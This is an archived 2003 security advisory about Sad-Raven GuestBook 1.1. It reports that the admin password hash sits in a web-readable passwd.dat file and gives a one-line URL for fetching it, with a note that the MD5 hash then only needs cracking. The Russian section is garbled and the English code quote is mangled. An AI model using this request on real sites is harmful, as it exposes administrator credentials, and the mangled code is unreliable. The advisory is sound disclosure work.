logo Home

Untitled Document

Home > Archives Advisories > Articles


Untitled Document

Untitled Document

Sad-Raven GuestBook Admin access
Date: 2003-03-22

Author : subj - r2subj3ct@dwclan.org

Product : Sad-Raven GuestBook
Version : 1.1
WebSite : http://www.sad-raven.ru
Problem : Admin access

[rus]

Description:
------------

???? ?????????? ???? admin.php, ????? ??????? ????????? ??????:

admin.php
=========
[...]

if (file_exists("passwd.dat") && $QUERY_STRING != ""):
require ("passwd.dat");
[...]
=========

?????? ?? ????? ??? ?????????? ???? ? ??????? ?? ?????????????????? ???????, passwd.dat,
?????? ? ??? ?????????? ?????????? MD5, ??????? ????????? ????? ???? ????????????.

passwd.dat
==========
<?php$Password['adm'] = "ecfa432505189a58be30f49f32b44026";?>
==========

[eng]

If to look a file admin.php, it is possible to see the next lines:

admin.php
=========
[...]

if (file_exists ("passwd.dat") ** $QUERY_STRING! = " "):
require ("passwd.dat";
[...]
=========

From here we see that there is a file with the password from admin access, passwd.dat, the
password in it is ciphered by algorithm MD5 which needs to be deciphered only.

passwd.dat
==========
<?php$Password['adm'] = "ecfa432505189a58be30f49f32b44026";?>
==========


Exploit:
--------

http://[somehost]/guestbook/passwd.dat



 

arrowSearch Advisories

arrowNewsletter

Free weekly Newsletter.

Please enter your email address here:
arrowReport Vulnerability

If you've found a vulnerability please
click here to report it.
arrowPartners

newsnow

About Us | Contact Us | Advertise | email | Backend flag
Copyright © 2016-2017 Security Corporation - All Rights Reserved - Legal - Privacy Policy